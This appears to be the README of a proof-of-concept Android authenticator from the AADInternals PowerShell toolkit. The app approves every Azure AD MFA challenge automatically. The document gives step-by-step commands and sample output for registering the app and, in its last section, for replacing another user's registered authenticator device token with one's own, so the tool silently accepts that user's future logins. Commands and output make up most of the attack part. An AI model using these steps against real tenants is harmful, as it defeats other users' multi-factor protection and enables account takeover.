Functionality provided through this app are not supported by Microsoft and thus should not be used in a production environment. Use on your own risk! NOTE: This app CAN NOT be installed to device with Microsoft Authenticator.
This is POC of a replacement authenticator for Microsoft Authenticator. This authenticator accepts all MFA authenticator challenges automatically.
Two ways to use:
- Register an app for yourself (this can't be the first registered method so register SMS etc. beforehand at
- Change user settings to use the app instead of their real Authenticator (requires Global Admin rights).
To use, you need the Device Token of your installed AADInternals Authenticator. You can then register the app or modify others' MFA settings using AADInternals.
There are a couple of steps you need to complete before continuing.
First, install the AADInternals PowerShell module:
Install-Module AADInternals
Next, import the module:
Import-Module AADInternals
If you see the following, you good to go!
___ ___ ____ ____ __ __
/ | / | / __ \/ _/___ / /____ _________ ____ _/ /____
/ /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ `/ / ___/
/ ___ |/ ___ |/ /_/ _/ // / / / /_/ __/ / / / / / /_/ / (__ )
/_/ |_/_/ |_/_____/___/_/ /_/\__/\___/_/ /_/ /_/\__,_/_/____/
v0.4.0 by @NestoriSyynimaa
Go to Releases and install the Authenticator to your Android device.
After installation, open the AADInternals Authenticator and click the button to get the Device Token. Should be something like:
Copy the token to clipboard and send it to yourself via email etc.
In PowerShell with AADInternals installed, set the token to a variable:
$DeviceToken = "APA91bEvVMWXcLy7EUEge4jSkD7HAAdWPn-0WjOHrkg0zZvVpg0LRBLa9QN7mEXyJSslqbkWx1Q5Qz8aZyJ69gs0rNGn-b5tc71P-XwRQ734AsdrDCvgJ5F9x17K6kfdisbFrT4z6xQE9EUxgMg5ZA8A-TVXepyqGQ"
Next, you need to get an Access Token for
Now you can register the app:
Register-AADIntMFAApp -AccessToken $Token -DeviceToken $DeviceToken -DeviceName "My App"
You should have the output similar to below. Also the app should show two notifications, one for authentication activation and another one for authentication request. Check your devices at to see your new app!
DefaultMethodOptions : 1
DefaultMethod : 0
Username : [email protected]
TenantId : 9a79b12c-f563-4bdc-9d18-6e6d0d52f73b
AzureObjectId : dce60ee2-d907-4478-9f36-de3d74708381
ConfirmationCode : 1481770594613653
OathTokenSecretKey : dzv5osvdx6dhtly4av2apcts32eqh4bg
OathTokenEnabled : true
In PowerShell with AADInternals installed, set the token to a variable:
$DeviceToken = "APA91bEvVMWXcLy7EUEge4jSkD7HAAdWPn-0WjOHrkg0zZvVpg0LRBLa9QN7mEXyJSslqbkWx1Q5Qz8aZyJ69gs0rNGn-b5tc71P-XwRQ734AsdrDCvgJ5F9x17K6kfdisbFrT4z6xQE9EUxgMg5ZA8A-TVXepyqGQ"
Next, you need to get an Access Token for Azure AD Graph API:
Now list the authentication apps of any user:
Get-AADIntUserMFAApps -AccessToken $Token -UserPrincipalName [email protected]
You should now have the list of user's authentication devices similar to below. Take a note of the Id of the device with Notification authentication type.
AuthenticationType : Notification, OTP
DeviceName : SM-R2D2
DeviceTag : SoftwareTokenActivated
DeviceToken : APA91bGEK7k3iOM3n6cNZvrRvYHVXfRixhjZzXOXUKszB5AoBRQUccsmbSi4GRqWLesCz1_Y6IRicEme_LdKZIi0RbDFWSb9PFF57bSrU0Lu8g3wIHiIUystWo7WBhG0YYfgQGWUYwszANMEs78jMxetMyOEw33IgA
Id : 454b8d53-d97e-4ead-a69c-724166394334
NotificationType : GCM
OathTokenTimeDrift : 0
OathSecretKey :
PhoneAppVersion : 6.2001.0140
TimeInterval :
AuthenticationType : OTP
DeviceName : NO_DEVICE
DeviceTag : SoftwareTokenActivated
Id : aba89d77-0a69-43fa-9e5d-6f41c7b9bb16
NotificationType : Invalid
OathTokenTimeDrift : 0
OathSecretKey :
TimeInterval :
Now you can replace user's Device Token with yours (remember to back up the original):
Set-AADIntUserMFAApps -AccessToken $Token -Id 454b8d53-d97e-4ead-a69c-724166394334 -DeviceToken $DeviceToken
Next time the user tries to log in, your authenticator will automatically accept user's MFA challenge.